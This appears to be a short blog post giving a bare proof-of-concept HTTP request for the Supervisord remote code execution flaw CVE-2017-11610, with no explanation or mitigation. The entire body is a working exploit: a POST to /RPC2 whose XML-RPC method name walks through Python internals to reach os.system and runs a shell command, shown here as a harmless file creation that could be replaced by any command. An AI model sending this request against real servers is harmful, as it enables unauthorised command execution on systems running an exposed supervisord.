Supervisord rce(CVE-2017-11610) 

POST /RPC2 HTTP/1.1

Host: localhost

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

Connection: close

Content-Type: application/x-www-form-urlencoded

Content-Length: 275

 

<?xml version="1.0"?>

<methodCall>

<methodName>supervisor.supervisord.options.warnings.linecache.os.system</methodName>

<params>

<param>

<string>touch /tmp/hello</string>

</param>

</params>

</methodCall>
posted @ 2019-12-09 15:55  mrhonest  阅读(484)  评论(0编辑  收藏  举报